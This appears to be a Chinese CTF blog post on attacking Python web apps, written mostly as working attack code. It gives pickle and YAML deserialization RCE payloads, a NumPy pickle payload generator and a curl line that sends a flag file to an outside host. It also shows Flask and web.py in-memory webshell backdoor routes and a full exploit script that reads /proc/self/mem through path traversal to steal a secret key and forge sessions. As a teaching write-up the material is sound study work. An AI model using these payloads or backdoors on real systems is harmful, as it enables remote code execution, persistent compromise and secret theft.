request.headers 请求头参数 request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data) request.data post传参 (Content-Type:a/b) request.json post传json (Content-Type: application/json) config 当前application的所有配置。 g {{g}}得到<flask.g of 'flask_ssti'>
读取配置信息 当一些代码执行、命令执行的函数被阻拦,重要信息可能就在config中
例如SECRET KEY
RCE中的沙盒逃逸 2024巅峰极客php_online 题目提供了源代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 from flask import Flask, request, session, redirect, url_for, render_templateimport osimport secretsapp = Flask(__name__) app.secret_key = secrets.token_hex(16 ) working_id = [] @app.route('/' , methods=['GET' , 'POST' ] ) def index (): if request.method == 'POST' : id = request.form['id' ] if not id .isalnum() or len (id ) != 8 : return '无效的ID' session['id' ] = id if not os.path.exists(f'/sandbox/{id } ' ): os.popen(f'mkdir /sandbox/{id } && chown www-data /sandbox/{id } && chmod a+w /sandbox/{id } ' ).read() return redirect(url_for('sandbox' )) return render_template('submit_id.html' ) @app.route('/sandbox' , methods=['GET' , 'POST' ] ) def sandbox (): if request.method == 'GET' : if 'id' not in session: return redirect(url_for('index' )) else : return render_template('submit_code.html' ) if request.method == 'POST' : if 'id' not in session: return 'no id' user_id = session['id' ] if user_id in working_id: return 'task is still running' else : working_id.append(user_id) code = request.form.get('code' ) os.popen(f'cd /sandbox/{user_id} && rm *' ).read() os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id} /init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py' ).read() os.popen(f'rm -rf /sandbox/{user_id} /phpcode' ).read() php_file = open (f'/sandbox/{user_id} /phpcode' , 'w' ) php_file.write(code) php_file.close() result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode' ).read() os.popen(f'cd /sandbox/{user_id} && rm *' ).read() working_id.remove(user_id) return result if __name__ == '__main__' : app.run(debug=False , host='0.0.0.0' , port=80 )
我们关注这个下面代码所示部分,这个部分较为核心
简单分析代码,可知可以使用一个8位的用户名创建一个沙盒,并在沙盒中用nobody(linux系统中的一个用户)这个低权限用户来执行php代码
1 2 3 4 5 6 7 8 9 10 11 12 13 working_id.append(user_id) code = request.form.get('code') os.popen(f'cd /sandbox/{user_id} && rm *').read() os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id}/init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py').read() os.popen(f'rm -rf /sandbox/{user_id}/phpcode').read() php_file = open(f'/sandbox/{user_id}/phpcode', 'w') php_file.write(code) php_file.close() result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode').read() os.popen(f'cd /sandbox/{user_id} && rm *').read() working_id.remove(user_id)
待更新
反序列化 Pickle反序列化 OPCODE V0版本的opencode
指令
描述
具体写法
栈上的变化
c
获取一个全局对象或import一个模块
c[module]\n[instance]\n
获得的对象入栈
o
寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象)
o
这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i
相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)
i[module]\n[callable]\n
这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N
实例化一个None
N
获得的对象入栈
S
实例化一个字符串对象
S’xxx’\n(也可以使用双引号、'等python字符串形式)
获得的对象入栈
V
实例化一个UNICODE字符串对象
Vxxx\n
获得的对象入栈
I
实例化一个int对象
Ixxx\n
获得的对象入栈
F
实例化一个float对象
Fx.x\n
获得的对象入栈
R
选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数
R
函数和参数出栈,函数的返回值入栈
.
程序结束,栈顶的一个元素作为pickle.loads()的返回值
.
无
(
向栈中压入一个MARK标记
(
MARK标记入栈
t
寻找栈中的上一个MARK,并组合之间的数据为元组
t
MARK标记以及被组合的数据出栈,获得的对象入栈
)
向栈中直接压入一个空元组
)
空元组入栈
l
寻找栈中的上一个MARK,并组合之间的数据为列表
l
MARK标记以及被组合的数据出栈,获得的对象入栈
]
向栈中直接压入一个空列表
]
空列表入栈
d
寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对)
d
MARK标记以及被组合的数据出栈,获得的对象入栈
}
向栈中直接压入一个空字典
}
空字典入栈
p
将栈顶对象储存至memo_n
pn\n
无
g
将memo_n的对象压栈
gn\n
对象被压栈
0
丢弃栈顶对象
0
栈顶对象被丢弃
b
使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置
b
栈上第一个元素出栈
s
将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中
s
第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u
寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中
u
MARK标记以及被组合的数据出栈,字典被更新
a
将栈的第一个元素append到第二个元素(列表)中
a
栈顶元素出栈,第二个元素(列表)被更新
e
寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中
e
MARK标记以及被组合的数据出栈,列表被更新
序列化 (打印的序列化pickle数据并未包含rce部分)
1 2 3 4 5 6 7 8 9 10 import pickleclass Student (): a = 'asd' b = 123 a = new Student() payload = pickle.dumps(a) print(payload)
反序列化 (payload已经过修改)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import pickleclass Student (): a = 'asd' b = 123 payload = b'''c__main__ Student )\x81}(V__setstate__ cos system ubVwhoami b.''' pickle.loads(payload)
全局变量覆盖 未完待更
R指令RCE 1 2 3 4 b'''(cos system S'whoami' R.'''
i指令RCE 1 2 3 4 b'''(S"whoami" ios system .'''
o指令RCE 1 2 3 4 b'''(cos system S'whoami' o.'''
b指令RCE 1 2 3 4 5 6 7 b'''c__main__ Student )\x81}(V__setstate__ cos system ubVwhoami b.'''
RCE的前提是有Student类
1 2 3 class Student(): a = 'asd' b = 123
Numpy RCE漏洞
NumPy 可以通过load方法加载 NumPy 二进制文件和 pickles
默认 NumPy 二进制文件格式会有 ZIP 的魔术头PK\x03\x04
和PK\x05\x06
,
如果不满足默认的格式,且设置了allow_pickle为True则会执行 pickle.load()方法
本质上还是pickle反序列化,可以运行以下程序生成payload, 生成test.bin
[cmd]
处替换为你想执行的命令
1 2 3 4 5 6 7 8 9 10 11 12 13 import pickleimport osclass Test (object ): def __init__ (self ): self.a = 1 def __reduce__ (self ): return (os.system, ('[cmd]' ,)) if __name__ == '__main__' : tmpdaa = Test() with open ("test.bin" ,'wb' ) as f: pickle.dump(tmpdaa,f)
然后使用numpy加载即可RCE, 注意需要设置allow_pickle=True
1 2 import numpy as npnp.load(f'test.bin' , allow_pickle=True )
强网杯2022-crash 仅过滤了R指令
此题由于过滤了secret不能直接变量覆盖,但是可以通过代码执行来进行变量覆盖
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import adminapp.secret_key=random.randbytes(12 ) class User : def __init__ (self, username,password ): self.username=username self.token=hash (password) def get_password (username ): if username=="admin" : return admin.secret else : return session.get("password" ) @app.route('/balancer' , methods=['GET' , 'POST' ] ) def flag (): pickle_data=base64.b64decode(request.cookies.get("userdata" )) if b'R' in pickle_data or b"secret" in pickle_data: return "You damm hacker!" os.system("rm -rf *py*" ) userdata=pickle.loads(pickle_data) if userdata.token!=hash (get_password(userdata.username)): return "Login First" if userdata.username=='admin' : return "Welcome admin, here is your next challenge!" return "You're not admin!"
(1)构造代码执行进行变量覆盖(i指令)
使用exec(类似eval)
1 2 3 4 b'''(S'exec('admin.se'+'cret="aaaa"')' i__builtin__ exec .'''
(2)直接命令执行(i指令)
使用os.system
1 2 3 4 b'''(S"curl xxx.xxxx/?=`cat /flag`" ios system .'''
YAML反序列化 基本的程序 1 2 3 4 5 6 7 8 import yaml payload = '''!!python/object/new:bytes - !!python/object/new:map - !!python/name:eval - ["__import__('os').popen('whoami"]''' yaml.load(payload)
1 2 3 4 5 6 import yamlpayload = b"""!!python/object/new:subprocess.check_output [["whoami"]]""" yaml.load(payload.decode("utf-8" ), Loader=yaml.Loader)
其它 Flask的内存马等 Flask的内存马适用于pickle反序列化、SSTI等能够达成代码执行,但题目不出网或无回显的情况
参考链接:
总的来说就是通过获取app对象,使用app对象中的add_url_rule方法添加能够RCE的后门路由达到内存马的效果
首先从sys.modules中获取app对象(sys.modules是一个全局字典,该字典是python启动后就加载在内存中)
1 getApp = sys.modules['__main__'].__dict__['app']
获取APP对象后就能操作当前Flask APP的配置了,
在无回显、不出网的前提下,为了获取RCE回显,此时有四条路可选
打开Flask的Debug模式,抛出Exception来回显
1 2 import syssys.modules['__main__' ].__dict__['app' ].debug=True
例如pickle反序列化代码执行的情况下使用异常信息来回显
1 2 3 4 class genpoc (object ): def __reduce__ (self ): s = "raise Exception(__import__('os').popen('ls /').read())" return exec , (s,)
关闭Flask的Debug模式,实现一个内存马(通过add_url_rule方法)
1 2 3 import syssys.modules['__main__' ].__dict__['app' ].debug=False sys.modules['__main__' ].__dict__['app' ].add_url_rule('/shell' ,'shell' ,lambda :__import__ ('os' ).popen('ls /' ).read())
设置Flask的静态文件目录为/tmp,通过>
写命令执行结果
1 2 3 4 import syssys.modules['__main__' ].__dict__['app' ].static_url_path='/static' sys.modules['__main__' ].__dict__['app' ].static_folder='/tmp/' __import__ ('os' ).popen('ls / > /tmp/test' ).read()
时间盲注,命令执行配合sleep逐字符判断,例如如下命令
假设flag是abcd,如果第一个字符为a则会执行sleep 3延时三秒,否则不执行sleep 3
1 echo 'abcd' | cut -b 1 | grep a && sleep 3
Web.py内存马 感谢NepNep的someb0dy师傅提供的思路,这里顺便记录一下web.py的内存马的实现方法
web.py中可以通过add_processor方法实现一个拦截器,调用handler()即为获取拦截前的路由的结果
1 2 3 4 5 6 7 def my_processor (handler ): print("before handling" ) result = handler() print("after handling" ) return result app.add_processor(my_processor)
当后端为web.py时的内存马实现方法如下
1 2 3 4 5 6 7 8 9 import sysdef hello (handler ): import subprocess params = web.input () cmd = params.cmd output = subprocess.check_output(cmd, shell=True ).decode('utf-8' ) return output app = sys.modules['__main__' ].__dict__['app' ] app.add_processor(hello)
Cat cat 这题是我给CatCTF 2022出的题,
因为看了蓝帽杯2022初赛的Web-file_session 觉得很有意思所以就参考了一下(ε=ε=ε=┏(゜ロ゜;)┛
提供docker-compose等文件:https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/cat_cat.zip
若想要直接复现可以到我的CTF平台:https://ctfm.lxscloud.top/category/test/challenge/13
同时提供exp文件下载(Python3.6以上):https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/getFlag.py
题目首页 进入题目首页可得以下界面
尝试点击绿色文字可以跳转到如下页面,可以猜测可能存在任意文件读取
尝试读取系统文件 检测是否能任意文件读取,读取/etc/passwd成功
读取源码 先读取cmdline获取源码文件名
通过../app.py读取源码
上图读出来的源码很乱,但由前面b开头可知这是python中的bytes类型
可以直接使用bytes的decode()方法获取格式化的源码,如下
1 2 a = b'abc\nabc' print(a.decode())
获取源码如下
app.py 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 import osimport uuidfrom flask import Flask, request, session, render_template, Markupfrom cat import catflag = "" app = Flask( __name__, static_url_path='/' , static_folder='static' ) app.config['SECRET_KEY' ] = str (uuid.uuid4()).replace("-" , "" ) + "*abcdefgh" if os.path.isfile("/flag" ): flag = cat("/flag" ) os.remove("/flag" ) @app.route('/' , methods=['GET' ] ) def index (): detailtxt = os.listdir('./details/' ) cats_list = [] for i in detailtxt: cats_list.append(i[:i.index('.' )]) return render_template("index.html" , cats_list=cats_list, cat=cat) @app.route('/info' , methods=["GET" , 'POST' ] ) def info (): filename = "./details/" + request.args.get('file' , "" ) start = request.args.get('start' , "0" ) end = request.args.get('end' , "0" ) name = request.args.get('file' , "" )[:request.args.get('file' , "" ).index('.' )] return render_template("detail.html" , catname=name, info=cat(filename, start, end)) @app.route('/admin' , methods=["GET" ] ) def admin_can_list_root (): if session.get('admin' ) == 1 : return flag else : session['admin' ] = 0 return "NoNoNo" if __name__ == '__main__' : app.run(host='0.0.0.0' , debug=False , port=5637 )
代码审计 从源码可知Python3程序,使用了Flask框架
审计app.py flag部分 首先关注含有flag的部分,以下代码可知程序一启动就读取并删除flag文件
1 2 3 if os.path.isfile("/flag" ): flag = cat("/flag" ) os.remove("/flag" )
关注到admin路由可以获取flag,但是需要完成session伪造
需要伪造内容为{"admin" : 1}
的session,则需要获取secret key
1 2 3 4 5 6 7 @app.route('/admin' , methods=["GET" ] ) def admin_can_list_root (): if session.get('admin' ) == 1 : return flag else : session['admin' ] = 0 return "NoNoNo"
secret key部分如下,是生成一个uuid然后去除-
再拼接*abcdefgh
组成的
1 app.config['SECRET_KEY' ] = str (uuid.uuid4()).replace("-" , "" ) + "*abcdefgh"
文件读取部分 可以看到任意文件读取功能是info路由提供的,
注意到可控参数有三个,分别是file,start和end
还注意到其中有个cat函数
1 2 3 4 5 6 7 8 @app.route('/info' , methods=["GET" , 'POST' ] ) def info (): filename = "./details/" + request.args.get('file' , "" ) start = request.args.get('start' , "0" ) end = request.args.get('end' , "0" ) name = request.args.get('file' , "" )[:request.args.get('file' , "" ).index('.' )] return render_template("detail.html" , catname=name, info=cat(filename, start, end))
分析源码可知cat函数由cat.py提供
审计cat.py 使用同样的方法读取cat.py的源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 import os, sys, getoptdef cat (filename, start=0 , end=0 )->bytes: data = b'' try : start = int (start) end = int (end) except : start=0 end=0 if filename != "" and os.access(filename, os.R_OK): f = open (filename, "rb" ) if start >= 0 : f.seek(start) if end >= start and end != 0 : data = f.read(end-start) else : data = f.read() else : data = f.read() f.close() else : data = ("File `%s` not exist or can not be read" % filename).encode() return data if __name__ == '__main__' : opts,args = getopt.getopt(sys.argv[1 :],'-h-f:-s:-e:' ,['help' ,'file=' ,'start=' ,'end=' ]) fileName = "" start = 0 end = 0 for opt_name, opt_value in opts: if opt_name == '-h' or opt_name == '--help' : print("[*] Help" ) print("-f --file File name" ) print("-s --start Start position" ) print("-e --end End position" ) print("[*] Example of reading /etc/passwd" ) print("python3 cat.py -f /etc/passwd" ) print("python3 cat.py --file /etc/passwd" ) print("python3 cat.py -f /etc/passwd -s 1" ) print("python3 cat.py -f /etc/passwd -e 5" ) print("python3 cat.py -f /etc/passwd -s 1 -e 5" ) exit() elif opt_name == '-f' or opt_name == '--file' : fileName = opt_value elif opt_name == '-s' or opt_name == '--start' : start = opt_value elif opt_name == '-e' or opt_name == '--end' : end = opt_value if fileName != "" : print(cat(fileName, start, end)) else : print("No file to read" )
文件读取功能 cat.py功能比较简单,整段源码最重要的部分如下
下面代码的作用是读取文件并以bytes返回,观察可知可以设定读取位置(start、end)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 def cat (filename, start=0 , end=0 )->bytes: data = b'' try : start = int (start) end = int (end) except : start=0 end=0 if filename != "" and os.access(filename, os.R_OK): f = open (filename, "rb" ) if start >= 0 : f.seek(start) if end >= start and end != 0 : data = f.read(end-start) else : data = f.read() else : data = f.read() f.close() else : data = ("File `%s` not exist or can not be read" % filename).encode() return data
使用方法 使用方法如下
例如新建一个a.txt,内容如下
使用app.py读取a.txt,从第1个位置开始到第3个位置
1 python3 cat.py -s 1 -e 3 -f a.txt
解题 这题的关键点就是伪造session,从而访问admin路由获取flag
但伪造session需要获取secret key
获取secret key 这里可以利用python存储对象的位置在堆上这个特性,
app是实例化的Flask对象,而secret key在app.config['SECRET_KEY']
,
所以可以通过读取/proc/self/mem来读取secret key
读取堆栈分布 由于/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,
所以先读取/proc/self/maps获取堆栈分布
1 2 3 4 5 6 7 8 map_list = requests.get(url + f"info?file={bypass} /proc/self/maps" ) map_list = map_list.text.split("\\n" ) for i in map_list: map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw" , i) if map_addr: start = int (map_addr.group(1 ), 16 ) end = int (map_addr.group(2 ), 16 ) print("Found rw addr:" , start, "-" , end)
读取对应位置内存数据 然后读取/proc/self/mem,读取对应位置的内存数据,
再使用正则表达式查找内容
1 2 3 4 5 res = requests.get(f"{url} /info?file={bypass} /proc/self/mem&start={start} &end={end} " ) if "*abcdefgh" in res.text: secret_key = re.findall("[a-z0-9]{32}\*abcdefgh" , res.text) if secret_key: print("Secret Key:" , secret_key[0 ])
伪造session session伪造可以利用如下项目
1 https://github.com/noraj/flask-session-cookie-manager
查看选手wp也发现有选手不是通过admin路由获取flag的,
而是查找内存中的flag变量,然后将包含flag
字符的内容保存下来,
最后通过strings配合grep查找
这样当然也行哈,我尝试了下选手的exp发现比较慢,但最终能获取flag
由于也是读mem,这题考点是读mem,所以不算非预期,
只是这种解法相较伪造session那种解法慢一些(我当时测题的时候内存数据没好好检测,没有读到flag哈哈哈哈哈)
一键获取flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 import requestsimport reimport ast, sysfrom abc import ABCfrom flask.sessions import SecureCookieSessionInterfaceurl = "http://" if sys.version_info[0 ] < 3 : raise Exception('Must be using at least Python 3' ) class MockApp (object ): def __init__ (self, secret_key ): self.secret_key = secret_key class FSCM (ABC ): def encode (secret_key, session_cookie_structure ): """ Encode a Flask session cookie """ try : app = MockApp(secret_key) session_cookie_structure = dict (ast.literal_eval(session_cookie_structure)) si = SecureCookieSessionInterface() s = si.get_signing_serializer(app) return s.dumps(session_cookie_structure) except Exception as e: return "[Encoding error] {}" .format (e) raise e s_key = "" bypass = "../.." map_list = requests.get(url + f"info?file={bypass} /proc/self/maps" ) map_list = map_list.text.split("\\n" ) for i in map_list: map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw" , i) if map_addr: start = int (map_addr.group(1 ), 16 ) end = int (map_addr.group(2 ), 16 ) print("Found rw addr:" , start, "-" , end) res = requests.get(f"{url} /info?file={bypass} /proc/self/mem&start={start} &end={end} " ) if "*abcdefgh" in res.text: secret_key = re.findall("[a-z0-9]{32}\*abcdefgh" , res.text) if secret_key: print("Secret Key:" , secret_key[0 ]) s_key = secret_key[0 ] break data = '{"admin":1}' headers = { "Cookie" : "session=" + FSCM.encode(s_key, data) } try : flag = requests.get(url + "admin" , headers=headers) print("Flag is" , flag.text) except : print("Something error" )
写在最后 未完待更